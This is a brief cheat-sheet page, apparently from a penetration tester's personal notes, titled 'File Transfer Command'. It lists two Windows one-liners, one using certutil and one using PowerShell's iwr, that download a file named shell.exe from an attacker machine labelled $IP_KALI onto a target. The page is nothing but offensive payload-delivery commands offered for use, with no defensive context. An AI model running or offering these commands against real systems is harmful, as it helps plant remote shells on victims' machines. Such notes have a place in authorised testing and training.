File Transfer Command

There are other ways also present. Below are some of the ways mainly used by me.

In Windows:

Using CMD:

certutil -urlcache -f http://$IP_KALI/shell.exe shell.exe

Using Powershell:

iwr -uri http://$IP_KALI:8000/shell.exe -OutFile shell.exe

Last updated